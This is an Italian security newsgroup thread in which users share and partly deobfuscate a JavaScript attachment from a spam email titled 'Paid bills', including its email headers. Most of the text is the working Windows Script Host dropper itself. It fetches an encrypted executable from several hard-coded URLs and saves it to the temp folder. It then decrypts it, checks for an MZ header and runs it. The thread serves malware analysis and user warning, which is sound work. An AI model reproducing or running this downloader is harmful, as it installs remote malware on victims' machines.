>>> \x20 \x20 \x20 \x20 \x20 \x20 \x20 \x20
>>>
>>>
\r\n\x53q[87\x334]=2\x33\x36;\r\nSq[9\x36\x36]=237;\r\nSq[949]=238;\r\nSq[8745]=239\x3b\r\nS\x71[88\x301]=5345

>>> - 5105;\r\x0aSq[177]=101 * \x32 + 39;\r\x0aSq[8805\x5d=-5465 +
>>> 5707;\r\nSq[8804]=243;\r\nSq[1522
>>>
+\x207470]=244\x3b\r\x0aSq[\x38\x39\x393]=245;\r\nSq[247]=246;\x0d\nSq[\x38776\x5d=247;\r\nSq[30

>>> * 5 + 26]\x3d3924 -
>>>
3676;\r\n\x53q[8729]\x3d249;\r\nSq\x5b183]=250;\r\nSq[8730]=251;\r\nSq[8319\x5d=252;\r\n\x53\x71[-6592

>>> +
>>>
6770]=253;\r\x0aS\x71\x5b9632]=254;\r\n\x53q[160]=255;\r\n\t\x0d\n\tvar\x20HFz=new

>>> Array\x28);\r\n\t\x66or \x28var \x4fPj\x3d6938 - 6938; OP\x6a \x3c
>>> Tf0[J\x51u\x28QSc) + (function\x20Cn\x32(){return \x4fXv9;}())];
>>> OPj++\x29\r\n\t\x7b\r\n\t\tva\x72 EFq7=Tf0[Xu4 + IDg5(RVk\x29 +
>>> Ir8](OPj);\r\n\t\tif \x28EFq7 < \x284 * 3\x32))\r\n\t\x09\t{\x76\x61r
>>> ENo=\x45Fq7;}\r\n\t\x09\x65lse\r\n\t\t\t{var
>>> ENo=Sq[EFq7];}\r\n\t\tHFz[(function \x47k(){retu\x72n RUn9;}()) +
>>> JVi\x5d(\x45No);\r\n\t};\r\x0a\t\r\n\treturn
>>> HFz;\r\n}\x3b\r\n\r\n\r\x0afunction Ly(\x44\x48f1 /* k \x2a/)\r\n{\r\n
>>> \x20 \x76ar Pa7=new
>>>
\x41rray();\r\n\t\r\nPa7[128\x5d=199;\r\nPa7[129'+''+']=252\x3b\r\nPa7[130]=233;\r\nPa7[131]=226\x3b\r\nPa\x37[1\x332]=228\x3b\r\nPa7[133]=224;\r\nPa7[134]=229;\r\x0a\x50\x617[13\x35]\x3d231;\r\nPa7[136]=2\x334;\r\nPa7[137\x5d=235;\r\x0aPa7[138]=232;\r\nPa7[13\x39]\x3d239;\x0d\nPa7[1\x340]=\x3238;\r\x0a\x50\x617[25

>>> * 5 +
>>> \x316]=236;\r\nPa7[142]=19\x36;\r\nPa\x37[143]=19\x37\x3b\x0d\nPa7[\x32210
>>> - 2066]=8219 - 8018;\r\nPa7[145]=230;\r\nPa7[\x37123 -
>>> 6977]=198;\r\nPa\x37[3\x3078 -
>>> \x32931]=244;\r\x0aPa7[148]=246;\x0d\nP\x617[5\x34 *\x202 + 41]=-74\x351
>>> \x2b
>>>
7693\x3b\r\nPa7\x5b150]=251\x3b\r\nPa7[151]=\x324\x39;\r\x0aPa\x37[152]\x3d255;\r\nPa7[73

>>> \x2a 2 \x2b 7]=2\x314;\r\nPa7[154]=220;\r\n\x50a7[-378\x37 +
>>> 3942]=162;\r\nPa7[\x3857 - 7\x301]=163;\r\nP\x617[2435\x20-
>>> 2\x3278]\x3d7\x3487 - 7322;\r\nPa7[-833\x38 + 8496]=1327 +
>>> 70\x33\x32\x3b\r\nPa7\x5b159]=402\x3b\r\nPa7[13 *\x201\x32 +
>>> 4]=225;\r\nPa7[1\x361\x5d=-7323 +
>>>
7\x3560;\r\nPa7[162]\x3d243;\r\nPa7[163\x5d=250;\r\x0a\x50a7[164]=241;\r\nP\x617[-7646\x20+

>>> 7\x3811]=209;\r\nPa7\x5b64 * 2 \x2b 38]=\x31535
>>> -\x201365\x3b\r\n\x50a7[16\x37]=186;\r\x0aPa7[-307 + 475]=60 * 3 +
>>> 1\x31;\r\nPa7[7758 \x2d 7589]=945 * 9 +
>>>
\x347\x31;\x0d\nPa7[170]=172;\r\nPa7[171\x5d=189;\r\nPa7[172]=188;\r\nPa7[173]=15

>>> * 10 + 1\x31;\r\nPa7\x5b-7814 +
>>> 7988]=17\x31;\r\nPa7[\x31\x37\x35]=187;\r\nPa7\x5b1\x376]=1\x37\x3023 -
>>>
7406;\r\n\x50a7[177]=9618;\r\nPa7[178]=9619;\r\nPa7[179]=9474;\r\nPa7[888\x37
>>> -
>>>
8707]=9508;\r\nP\x617[1\x38'+''+'1]=9569;\r\nPa7[182]=9570;\r\nPa7[1\x383]=2474
>>> *\x203 + 2\x31\x336;\r\x0aPa7[\x3184]=9557\x3b\x0d\nPa7[185]=17863 -
>>> 8292;\r\nPa7[\x3186]=17177 - 7624;\r\nPa7[10143 - \x39956]=3117\x20* 3 +
>>> 2\x30\x38;\r\nPa7[188]=9565;\x0d\nPa7[7026 \x2d
>>> 6837]=9564;\r\x0aPa7[19\x30]=956\x33;\r\nPa7\x5b-69\x360 +
>>> 7151]\x3d9488;\r\nPa\x37[192]=24 * 395 +
>>> 12;\r\x0aPa7[193]=9524;\r\n\x50a7[7489 - 7295]=11205 -
>>> 1689;\r\nPa7[195\x5d=9172 +
>>> 3\x328;\r\nPa7[196]=947\x32;\r\nPa7[197]=9532;\r\nPa7[198]=14\x3788 -
>>> 5222;\r\nPa7[199]=3280 * 2 \x2b
>>> \x33007;\r\x0aPa7[2\x30\x30]=9562\x3b\r\nPa7[-1245 +
>>> 1446]=9556\x3b\r\x0aPa7[-609\x34 + 6296]=9577;\r\nPa7\x5b\x34\x3501\x20-
>>> 4\x3298]=9574\x3b\r\nPa7[-835\x36 + 856\x30]\x3d\x316041 \x2d
>>> 6473;\r\nP\x617[205]=9552;\r\nPa7[206\x5d=18878 -
>>> 9298;\r\n\x50a7\x5b207]=9575;\r\nPa7[208]=957\x36;\r\x0aPa7[209]=16184 -
>>> 6612;\r\n\x50a7[\x329 * 7 +\x207\x5d=3391 +
>>> 618\x32\x3b\r\nP\x61\x37[211]=\x39561;\r\nP\x617[212]=12923 -
>>>
3363\x3b\r\nPa7[213]=9554;\r\nPa7[214]=9555;\r\nPa7[215]=9\x3579;\r\n\x50a7[42\x381

>>> - 4065]\x3d95\x378;\r\nP\x617[21\x37]=9\x3496;\x0d\nPa7[78 * 2 +
>>> 62]=9484;\r\x0a\x50a7\x5b219]\x3d19023 \x2d
>>> 9415;\r\nPa7[220]=9604;\r\nPa7[5 * 4\x34 +
>>> 1\x5d=9612;\x0d\x0aPa7[222]=\x39616;\r\nP\x617[22\x33]=2260 * 4 +
>>> 560;\r\nPa7[224]\x3d945;\r\nP\x617[225]=6228 - 60\x305;\r\nPa7[-4150 \x2b
>>> 4376]=915;\r\nPa7[-3111 + 3\x3338]=960;\r\nPa'+''+'7[\x328 * 8 +
>>> 4]=9\x331;\r\n\x50a7[229\x5d=-\x37943 +
>>> \x3890\x36;\r\nPa\x37[\x3230]=181\x3b\r\nPa7\x5b-6447 +
>>> 6678]=96\x34;\r\nPa7[-2571 \x2b 2803]=934;\r\nPa7[233]=396 * 2 +
>>> 128;\x0d\nP\x617[2\x334]=937;\r\nPa7[235]=281 * 3 +
>>> 105;\r\n\x50a7[236]\x3d873\x34;\r\nPa7[237]\x3d\x32\x35 * 38 +
>>> 16;\r\nPa7[2\x338]=9\x349;\r\nPa7[239]=87\x345;\r\nPa7[240]=-293 +
>>> 909\x34;\r\x0aPa7[89 * 2 +
>>> 63]=\x317\x37;\r\x0aPa7[242\x5d\x3d8805;\r\nPa7[90 \x2a 2 +
>>> \x363]\x3d8804;\x0d\nPa7[24\x34]=8992\x3b\r\nPa\x37\x5b-2514 +
>>> 2759]=2\x354\x33 *\x203 +
>>>
1364;\r\nPa\x37\x5b2\x346]=\x3247;\r\x0aPa7[247]=87\x376;\r\nPa7[\x336\x20\x2a
>>> 6 + 32]=2 * 88;\r\nPa7[249]\x3d8729;\x0d\nPa7[55 * 4 +
>>> 30]=183;\r\nP\x61\x37[2\x351]=1\x36189
>>> -\x207459;\r\nPa7[252]=8319;\r\nP\x617[2\x353]=178;\r\x0aPa7[254]=193\x363
>>> - 9731;\r\n\x50a7[255\x5d=160;\r\n\t\r\n\tva\x72 Dq=new
>>> Array\x28);\r\n\tv\x61r O\x67=""\x3b\r\n\x09var ENo; v\x61\x72
>>> EFq7;\r\n\tfor \x28var \x4fPj=1 * 0;\x20OPj < DHf1[\x51Sc + OXv9\x5d;
>>> OPj++)\r\n\t{\r\n\x09\t\x45No=\x44Hf1[OPj];\r\n\t\tif (ENo < 1\x328)
>>> \r\n\t\t\t{EFq\x37=ENo;}\r\n\t\telse
>>> \r\n\t\t\t{EF\x717=Pa7[ENo]\x3b}\r\n\x09\t\x44q.push(St\x72ing[Kt + Fd\x20+
>>> XU\x77 +
>>> Eo\x36](E\x46q7));\r\n\t}\r\n\t\x0d\n\tOg=Dq[RFj]("");\r\n\t\r\n\tre\x74urn
>>> Og;\r\n\x7d;\r\n\r\x0a\r\nfu\x6ectio\x6e \x56\x678(Ec, DHf\x31 /* k
>>> */)\r\n{\r\n var WHy0=\x57\x53cript\x5bRJe4 + LFp + As3 \x2b
>>> Up(Zu\x29](TYj+Cc0+V\x773(W\x746)+XOs\x20+ Yv \x2b Xf)\x3b\r\n
>>> WHy0[LOe3]=D\x41e;\r\n'+''+'\x20 W\x48y0[Sm2 \x2b Uq]\x3dUMc /* k */;
>>> \r\n\x20 WHy0[IDg]()\x3b\r\n \x20 WHy0[Uf9 + R\x46\x6c + (function
>>> In(){r\x65turn\x20LUg;}(\x29)](L\x79(DHf1\x20/* k */))\x3b\x0d\n
>>> WHy0[Hs2 + Sa0 + ETx9\x20+ ZZ\x638](Ec, \x32);\r\n\r\n WHy0[KCh5 + TZa +
>>> RVy]()\x3b\r\n};';
// Execution point of the sample: the statement above only assigns one long
// string literal to aMSq4, and nothing in that string runs until this eval()
// passes it to the script engine. The \xNN escapes and the '+''+' splits are
// resolved by the engine when the literal is parsed, so the text reaching
// eval() is the plain script.
eval(aMSq4);
// Reached only if the evaluated code returns without calling WScript.Quit
// itself (the string contains its own WScript.Quit(0) calls); ends the
// script host with exit code 1.
WScript.Quit(1);


----
La mail che lo aveva come allegato:

Return-Path: <Sweeney.79422@centennialpr.net>
X-Original-To: ******* ******* yyy.yy
Delivered-To: ******* yyy.yy
Received: from 242-162-231-66-static.centennialpr.net (unknown
[66.231.162.242])
by zz.zzz.zz (Postfix) with ESMTP id AC94924A01A87
for ******* ******* xx>; Tue, 2 Aug 2016 16:42:57 +0200 (CEST)
Received-SPF: pass ******* ******* ******* domain of centennialpr.net
designates
66.231.162.242 as permitted sender) client-ip=66.231.162.242;
envelope-from=sweeney.79422@centennialpr.net;
helo=242-162-231-66-static.centennialpr.net;
Received: from root by centennialpr.net with local (Exim 4.80)
(envelope-from
<bounce-09931306-141303-3369745-5254510@centennialpr.net>)
id gWuDyI-vefhmY-ll
for ******* ******* xx; Tue, 02 Aug 2016 10:42:56 -0400
To: ******* ******* ******* xx>
Subject: Paid bills
X-PHP-Originating-Script: 0:class.phpmailer.php
Date: Tue, 02 Aug 2016 10:42:56 -0400
From: "Bradly Sweeney" <Sweeney.79422@centennialpr.net>
Reply-to: "Bradly Sweeney" <Sweeney.79422@centennialpr.net>
Message-ID: <f12e3326544ac7cf63c5501e2bfa8afc ******* xx>
X-Priority: 3
Sender: <user-E9508@centennialpr.net>
X-Mailer: Email Sending System
X-Complaints-To: m@centennialpr.net
List-Unsubscribe:
<https://www.centennialpr.net/app/unsubscribe.php?p=d>
List-Id: 56243
X-Postmaster-Msgtype: 17601
X-Report-Abuse:
<https://www.centennialpr.net/app/report_abuse.php?mid=0b>
Precedence: bulk
Orig-date: Tue, 02 Aug 2016 10:42:56 -0400
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="b1_0412"

--
Alex

Skywalker Senior 3 Ago 2016 19:46
Sembra che Alex abbia detto :
> Allego un probabile virus che è arrivato in formato compresso .zip
>
> Si tratta di un javascript.
>
> ATTENZIONE: LEGGETELO SOLO CON UN EDITOR DI TESTO, tipo notepad.
>
> Sembra qualcosa che sfrutta le vulnerabilità di Explorer.
>
> Io non riesco a capire con chi vorrebbe comunicare questo presunto virus.
>
> Bye
> Alex
>
> ------------
> VIRUS - LEGGERE SOLO CON NOTEPAD
>

Appena ho aperto il messaggio, Defender si è allarmato, nonostante sia
solo testo!
Arne Saknussemm 4 Ago 2016 09:57
On Tue, 02 Aug 2016 19:12:22 +0200
"Alex" wrote in it.comp.sicurezza.virus
<nnqk9p$1k4l$1@adenine.netfront.net>:


Quella sotto è la versione parzialmente "deoffuscata", nel caso a
qualcuno interessi. Non credo si tratti di una vulnerabilità di IE, quanto
dello sfruttamento del motore di scripting di Windows (Windows Script Host:
lo script usa l'oggetto WScript): la prima cosa che lo script fa è caricare
il codice in una variabile, come semplice stringa, e subito dopo eseguirlo
usando la "eval" posta in fondo allo script. Per quanto poi riguarda il
"cosa faccia", al momento non ho tempo per giocarci, ma se qualcuno volesse
torturarlo ...

var aMSq4 = 'if (WScript.Path["charAt"](WScript.Path.length-1) != "2")
WScript.Quit(0); var Pe10 = "e" + "";
var Uz4 = "clos" + "";
var JTc3 = "oFile" + "";
var Pe1 = "SaveT" + "";
var LUg = "ext" + "";
var RFl = "iteT" + "";
var Uf9 = "wr" + "";
var JQt = "open" + "";
var XDd9 = "set" + "";
var Yu = "Char" + "";
var ULy = "type" + "";
var KOe = "ream" + "";
var HGb9 = "St" + "";
var Uh = "DB." + "";
var Vo5 = "O" + "";
var NJt = "D" + "";
var Gd = "A" + "";
var Sz = "t" + "";
var My9 = "jec" + "";
var Ha1 = "eOb" + "";
var Po0 = "eat" + "";
var Hy8 = "Cr" + "";
var RFj = "join" + "";
var Eo6 = "e" + "";
var XUw = "rCod" + "";
var Fd = "omCha" + "";
var Kt = "fr" + "";
var Fx = "gth" + "";
var Jc = "len" + "";
var JVi = "sh" + "";
var RUn9 = "pu" + "";
function IDg5(MGd){return MGd;};
var Ir8 = "eAt" + "";
var RVk = "od" + "";
var Xu4 = "charC" + "";
var Ec9 = "th" + "";
var SMe3 = "leng" + "";
var Mk4 = "e" + "";
var AQa9 = "clos" + "";
function Pa(Vk){return Vk;};
function NGe4(NSs5){return NSs5;};
var XHa = "ext" + "";
var IGy0 = "ReadT" + "";
var DEm7 = "le" + "";
var Sx = "mFi" + "";
var EHh = "ro" + "";
var Lz = "LoadF" + "";
var Wn = "en" + "";
var El9 = "op" + "";
function Eq9(Mn){return Mn;};
var Uq = "et" + "";
var Sm2 = "Chars" + "";
var Hf8 = "pe" + "";
var ZHh = "ty" + "";
var Ie = "m" + "";
var NFm = "rea" + "";
var KKc1 = "DB.St" + "";
var Zg2 = "O" + "";
var VNd = "D" + "";
var Pv4 = "A" + "";
var SXr = "ct" + "";
var Ix = "Obje" + "";
var YNs7 = "ate" + "";
var Ml7 = "Cre" + "";
var YKl6 = "h" + "";
var Uj = "lengt" + "";
var YJh = "h" + "";
var Zf = "gt" + "";
var VAy5 = "len" + "";
var NCr8 = "ce" + "";
var If0 = "spli" + "";
var Wv2 = "h" + "";
var YCu = "lengt" + "";
var Xg0 = "gth" + "";
var LUo6 = "len" + "";
var RKw = "gth" + "";
var JNj6 = "len" + "";
var RVp0 = "h" + "";
var Zh9 = "lengt" + "";
var PNa5 = "th" + "";
var Lg = "leng" + "";
var Sa1 = "p" + "";
var UZu1 = "Slee" + "";
var Oj9 '+''+'= "23" + "";
var IDj = " 3" + "";
var Et1 = "n" + "";
var ILh6 = "Ru" + "";
var Wx = "ngth" + "";
var Bv5 = "le" + "";
var Ki9 = "h" + "";
var Ma8 = "ngt" + "";
var XUv = "le" + "";
function DEk0(Ja){return Ja;};
function PJh(MTj4){return MTj4;};
var RVy = "e" + "";
var TZa = "os" + "";
var KCh5 = "cl" + "";
function AFy(UWx3){return UWx3;};
var ZZc8 = "le" + "";
var ETx9 = "oFi" + "";
var Sa0 = "veT" + "";
var Hs2 = "Sa" + "";
function Go(SQn5){return SQn5;};
var HXi6 = "n" + "";
var WHy5 = "io" + "";
var MPk5 = "posit" + "";
var GTg = "Body" + "";
var Ih2 = "onse" + "";
var MUc1 = "sp" + "";
var YZb = "Re" + "";
function STv0(Ra0){return Ra0;};
var TVr3 = "e" + "";
var VTk0 = "writ" + "";
var LOe3 = "type" + "";
var JWz3 = "n" + "";
var APp7 = "ope" + "";
function Xp6(Ik){return Ik;};
var Xf = "ream" + "";
var Yv = "St" + "";
var XOs = "DB." + "";
function Vw3(NAa){return NAa;};
var Wt6 = "O" + "";
function Mf(MVd1){return MVd1;};
var Cc0 = "D" + "";
var TYj = "A"'+''+' + "";
var Ee = "t" + "";
var Kf1 = "bjec" + "";
var Yj = "teO" + "";
var FFm = "Crea" + "";
var Lr5 = "Sleep" + "";
var UIm = "d" + "";
var LEs7 = "sen" + "";
var BEf = "gth" + "";
var Uh6 = "len" + "";
function KEx3(TEw){return TEw;};
var Aa9 = "GET" + "";
var IDg = "open" + "";
function Ck9(KFj){return KFj;};
var IDo = "p" + "";
var SDb = "Slee" + "";
var TPl = "h" + "";
var LLl3 = "lengt" + "";
var RRi8 = "ect" + "";
var Aj = "eObj" + "";
var Dr = "Creat" + "";
var ZFt = "gth" + "";
var Bv8 = "len" + "";
function Zk(KHz9){return KHz9;};
var Wi2 = "P" + "";
var Sk = "MLHTT" + "";
var Ze = "2.X" + "";
var NCa = "MSXML" + "";
var NId1 = ".1" + "";
var Xx4 = "t.5" + "";
var GWy = "es" + "";
var Bq1 = "Requ" + "";
var Lf7 = "tp" + "";
var Kf6 = "Ht" + "";
var Aw = "in" + "";
var Bv7 = "tp.W" + "";
var PAn = "Ht" + "";
var ZAe = "Win" + "";
var IFm4 = "/" + "";
var Pr10 = "789+" + "";
var VFa = "23456" + "";
var CCz = "01" + "";
var Wv = "vwxyz" + "";
var '+''+'Pd9 = "rstu" + "";
var VHo = "mnopq" + "";
var VBk = "ijkl" + "";
var Cc = "gh" + "";
var Dv6 = "bcdef" + "";
var Ms = "WXYZa" + "";
var YVo = "RSTUV" + "";
var Ml = "MNOPQ" + "";
var Lm = "IJKL" + "";
var Pr1 = "FGH" + "";
var Zo = "ABCDE" + "";
var USw = "xe" + "";
var IFj0 = ".e" + "";
function Jl(ZYi){return ZYi;};
var Uh8 = "dj" + "";
var LVd = "R7" + "";
var DTv = "pVW" + "";
var Rh1 = "e3" + "";
var RGn = "XN" + "";
function Jn9(Jm3){return Jm3;};
var ZSf = "%/" + "";
var PEc = "%TEMP" + "";
var SSq = "ell" + "";
var DWb8 = "pt.Sh" + "";
var Ot8 = "WScri" + "";
function Up(Wr6){return Wr6;};
var Zu = "t" + "";
var As3 = "jec" + "";
var LFp = "ateOb" + "";
var RJe4 = "Cre" + "";
var IVm = "v" + "";
var Hh = "4zo4c" + "";
var RGl2 = "qk" + "";
var NLs = "l/" + "";
var Wc = "j.p" + "";
var Lq3 = "fu" + "";
var Xs5 = "gra" + "";
var Oj2 = "foto" + "";
var Dt6 = "//" + "";
var Ri5 = "p:" + "";
var Yy1 = "htt" + "";
var Ae = "62" + "";
var Cl8 = "cn" + "'+''+'";
var Un = "lcou" + "";
function RTo2(Xh1){return Xh1;};
var Lr8 = ".com/" + "";
var QRy5 = ******* + "";
var MSc5 = "oi" + "";
var NAm9 = "w.gi" + "";
var Qq = "//ww" + "";
var WSb0 = "p:" + "";
function Rj3(TXh){return TXh;};
var Sj5 = "htt" + "";
var FYs1 = "nt3" + "";
var Nn5 = "43" + "";
var Cy5 = "/07" + "";
var Po = "et" + "";
var RWi = ".n" + "";
var Wn1 = "ana" + "";
var Nl = ".bag" + "";
var Qc4 = "ww" + "";
var Ei = "/w" + "";
var Kx2 = ":/" + "";
var SUf2 = "http" + "";
var Lc = "7" + "";
var Ep3 = "43" + "";
var Vh = "th" + "";
var WKb = "leng" + "";
function Su(SHv4){return SHv4;};
var Xt6 = "VV" + "";
var MSl = "VV" + "";
var Te1 = "VVVVV" + "";
var Zs5 = "VV" + "";
var CZi8 = "fd" + "";
var KJd = "sdfas" + "";
var Dv3 = "asfa" + "";
var OOh = "h" + "";
var Ud8 = "gt" + "";
var FOp3 = "len" + "";
function Zb1(CZq){return CZq;};
var Pa1 = "V" + "";
var Gs4 = "VVVVV" + "";
var TXe8 = "VV" + "";
var HMr4 = "VVVVV" + "";
var Ol = "VVV" + "";
var '+''+'ZDo7 = "VVVV" + "";
var YUc = "VV" + "";
var Xc6 = "VV" + "";
var Wp = "VVVVV" + "";
var Ca8 = "VVVVV" + "";
var Dh5 = "VVV" + "";
var EGw = "VV" + "";
var Mj = "VVVVV" + "";
function Oq(Pf0){return Pf0;};function SGv(KLy5){return KLy5;};function
JQu(KKh4){return KKh4;}; var OXv9 = "gth" + "";
var QSc = "len" + "";
var EYf = "VVV" + "";
var IIk2 = "VV" + "";
var CZy = "VV" + "";
var Jl9 = "VVVVV" + "";
function If(YBe){return YBe;};
var Kg = "132" + "";
var BSs4 = "1123" + "";
var Mz9=(BSs4 + If(Kg), Jl9 + CZy + IIk2 + (function NKy0(){return
EYf;}())); var Te=Mz9[QSc + OXv9];
var NVd=(Mj + (function Oi5(){return EGw;}()) + Dh5 + Ca8 + (function
EPo(){return Wp;}()) + Xc6 + Zb1(YUc) + ZDo7 + Ol + HMr4 + TXe8 + Gs4 +
Pa1); var Gz = 672168; var Id=NVd[QSc + OXv9];
var Pe0=(Dv3 + KJd + (function IMn(){return CZi8;}()), Zs5 + Te1 +
Su(MSl) + Xt6); var UWy4=Pe0[QSc + (function LBy(){return OXv9;}())];

var GRx5=1;
var DAe=2;
var Ya=3607 - 3605;
var UMc="437";

var ERb='+''+'[SUf2+Kx2 + (function Fb(){return Ei;}())+Qc4+(function
Zq9(){return Nl;}())+Wn1+RWi+Po+Cy5 + Nn5+(function GNn(){return
FYs1;}()), Rj3(Sj5)+WSb0+(function Ry0(){return Qq;}())+NAm9+MSc5 +
QRy5+RTo2(Lr8)+Un+Cl8+Ae, Yy1 + Ri5+(function Xl2(){return
Dt6;}())+Oj2+Xs5 + Lq3+Wc+(function Ii(){return NLs;}()) +
RGl2+Hh+IVm]; var Ba5=WScript[RJe4 + LFp + As3 + (function Wc6(){return
Zu;}())](Ot8 + DWb8 + SSq); var
Mz=Ba5.ExpandEnvironmentStrings(Jn9(PEc) + ZSf); var RJp2=Mz + RGn +
Rh1 + Jl(DTv) + (function GOk(){return LVd;}()) + Uh8; var RCn=RJp2 +
IFj0 + USw;

function uheprng() {return (function() {
var o = 48, c = 1, p = o, s = new Array(o);
var i,j;
var base64chars =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; var
mash = Mash(); for (i = 0; i < o; i++) s[i] = mash(Gz);
mash = null;
var random = function( range ) {
return Math.floor(range * (rawprng() + (rawprng() * 0x200000 | 0) *
1.1102230246251565e-16)); }

function rawprng() {
if (++p >= o'+''+') p = 0;
var t = 1768863 * s[p] + c * 2.3283064365386963e-10;
return s[p] = t - (c = t | 0);
}return random;}());};

function Mash() {
var n = 0xefc8249d;
var mash = function(data) {
if ( data ) {
data = data.toString();
for (var i = 0; i < data.length; i++) {
n += data.charCodeAt(i);
var h = 0.02519603282416938 * n;
n = h >>> 0;
h -= n;
h *= n;
n = h 0;
h -= n;
n += h * 0x100000000;
}
return (n >>> 0) * 2.3283064365386963e-10;
} else n = 0xefc8249d;
};
return mash;
}

var Pe=[ZAe + PAn + Bv7 + Aw + Kf6 + Lf7 + Bq1 + GWy + Xx4 + NId1,
(function Dq8(){return NCa;}()) + Zk(Ze) + Sk + (function BIy1(){return
Wi2;}())];

for (var OPj=0; OPj < Pe[QSc + (function FTj(){return OXv9;}())]; OPj++)
{
try
{
var Sy=WScript[(function Re1(){return RJe4;}()) +
(function Mh(){return LFp;}()) + As3 + Zu](Pe[OPj]); break;
}
catch (e)
{
continue;
}
};

var Uz=7408 - 7407;
var OEq6=0;
do
{
try
{
if (1== Uz)
{
if (OEq6 >= ERb[QSc + OXv9]'+''+')
{
OEq6=0;
WScript[Ck9(SDb) + IDo](1000);
}
Sy[IDg](KEx3(Aa9), ERb[OEq6++ % ERb[QSc +
OXv9]], false); Sy[LEs7 + (function Od(){return UIm;}())]();
}

if (Sy.readystate < (-1915 + 1919))
{
WScript[SDb + IDo](-1310 + 1410);
continue;
}

var ARt=WScript[RJe4 + LFp + (function CYi(){return
As3;}()) + (function ELr4(){return Zu;}())](TYj+Mf(Cc0)+Wt6+XOs + Yv +
Xp6(Xf)); ARt[IDg](); ARt[LOe3]=GRx5;
ARt[VTk0 + STv0(TVr3)](Sy[YZb + MUc1 + Ih2 + GTg]);
ARt[MPk5 + WHy5 + Go(HXi6)]=1 * 0;
ARt[Hs2 + AFy(Sa0) + (function Ix6(){return ETx9;}()) +
ZZc8](RJp2, Ya); ARt[DEk0(KCh5) + TZa + PJh(RVy)]();

var HFz=KTb8 /* k */(RJp2);
HFz=BKw(HFz);
if (HFz[QSc + OXv9] < 100 * 1024 || HFz[QSc + Oq(OXv9)]
> (58 * 3 + 56) * 1024 || !VOy7(HFz)) {
Uz=1;
continue;
}
try
{
Vg8(RCn, HFz);
}
catch (e) {break;};

Ba5[ILh6 + Et1](RCn + (function JYj5(){return IDj;}())
+ Oj9); break;
}
catc'+''+'h (e) {WScript[SDb + IDo](1000); continue;};
} while (Uz);

WScript.Quit(0);

function BKw(DHf1 /* k */)
{
var REt2;

var XPx8 = uheprng();
for (var OPj=0; OPj < DHf1[QSc + OXv9]; OPj++)
{
DHf1[OPj] ^= XPx8(256);
}

var Cm=DHf1[DHf1[QSc + SGv(OXv9)]-4] | DHf1[DHf1[QSc + OXv9]-3]
<< (-1476 + 1484) | DHf1[DHf1[QSc + OXv9]-2] << 16 |
DHf1[DHf1[QSc + OXv9]-1] << 24; DHf1[If0 + NCr8](HFz[QSc +
OXv9]-4, 4); REt2=Te;
for (var OPj=0; OPj < DHf1[QSc + OXv9]; OPj++)
{
REt2=(REt2 + DHf1[OPj]) % 0x100000000;
};
if (REt2 != Cm) {return [];};

return DHf1 /* k */;
};


function VOy7(DHf1 /* k */)
{
if (DHf1[0]== 0x4D && DHf1[1]== 0x5a)
{return true;}
else
{return false;}
};


function KTb8 /* k */(Ec)
{
var WHy0=WScript[RJe4 + LFp + As3 + (function Wc0(){return
Zu;}())](TYj+(function Gi2(){return Cc0;}())+Wt6+XOs + Yv + Xf);
WHy0[LOe3]=DAe; WHy0[Sm2 + Eq9(Uq)]=UMc /* k */;
WHy0[IDg]();
WHy0[Lz + EHh + Sx + DE'+''+'m7](Ec);
var Bw=WHy0[Pa(IGy0) + NGe4(XHa)];
WHy0[KCh5 + TZa + RVy]();
return NFc(Bw);
};


function NFc(Tf0)
{
var Sq=new Array();

Sq[2071 - 1872]=128;
Sq[252]=129;
Sq[233]=130;
Sq[226]=-370 + 501;
Sq[228]=5449 - 5317;
Sq[224]=133;
Sq[229]=134;
Sq[231]=135;
Sq[-1236 + 1470]=136;
Sq[235]=-6251 + 6388;
Sq[52 * 4 + 24]=-6678 + 6816;
Sq[239]=9632 - 9493;
Sq[25 * 9 + 13]=140;
Sq[236]=141;
Sq[-1000 + 1196]=142;
Sq[6707 - 6510]=37 * 3 + 32;
Sq[201]=144;
Sq[5754 - 5524]=145;
Sq[198]=146;
Sq[244]=-9711 + 9858;
Sq[246]=-8937 + 9085;
Sq[242]=149;
Sq[7242 - 6991]=150;
Sq[249]=6872 - 6721;
Sq[255]=152;
Sq[28 * 7 + 18]=153;
Sq[220]=154;
Sq[162]=155;
Sq[163]=156;
Sq[165]=157;
Sq[1090 * 7 + 729]=158;
Sq[402]=-4162 + 4321;
Sq[225]=160;
Sq[237]=-1832 + 1993;
Sq[243]=162;
Sq[20 * 12 + 10]=163;
Sq[241]=164;
Sq[209]=77 * 2 + 11;
Sq[170]=166;
Sq[3079 - 2893]=167;
Sq[191]=83 * 2 + 2;
Sq[8976]=-4856 + 5025;
Sq[172]=170;
Sq[8635 - 8446]=171;
Sq'+''+'[188]=172;
Sq[161]=-6756 + 6929;
Sq[171]=174;
Sq[187]=175;
Sq[9617]=176;
Sq[6264 + 3354]=177;
Sq[9619]=55 * 3 + 13;
Sq[9474]=179;
Sq[9508]=9225 - 9045;
Sq[9569]=181;
Sq[9570]=182;
Sq[9558]=183;
Sq[18638 - 9081]=184;
Sq[9571]=185;
Sq[9553]=186;
Sq[9559]=187;
Sq[4507 + 5058]=188;
Sq[9564]=189;
Sq[15896 - 6333]=190;
Sq[5416 + 4072]=191;
Sq[1142 * 8 + 356]=85 * 2 + 22;
Sq[1285 * 7 + 529]=193;
Sq[9516]=194;
Sq[9500]=195;
Sq[9472]=196;
Sq[3928 + 5604]=197;
Sq[9566]=198;
Sq[9330 + 237]=199;
Sq[2706 + 6856]=97 * 2 + 6;
Sq[9556]=201;
Sq[9577]=202;
Sq[5251 + 4323]=203;
Sq[4346 * 2 + 876]=204;
Sq[9552]=205;
Sq[9580]=206;
Sq[9575]=7962 - 7755;
Sq[9576]=208;
Sq[9572]=209;
Sq[9573]=210;
Sq[9561]=211;
Sq[9560]=212;
Sq[9554]=213;
Sq[9555]=214;
Sq[9579]=215;
Sq[9578]=47 * 4 + 28;
Sq[9496]=217;
Sq[9484]=218;
Sq[9608]=219;
Sq[9604]=5823 - 5603;
Sq[9612]=221;
Sq[9616]=59 * 3 + 45;
Sq[3850 * 2 + 1900]=223;
Sq[945]=224;
Sq[-5278 + 5501]=225;
Sq[915]'+''+'=226;
Sq[-6277 + 7237]=227;
Sq[931]=-1173 + 1401;
Sq[237 * 4 + 15]=229;
Sq[181]=-8247 + 8477;
Sq[964]=231;
Sq[934]=88 * 2 + 56;
Sq[920]=233;
Sq[937]=234;
Sq[336 * 2 +
276]=235; Sq[8734]=236;
Sq[966]=237;
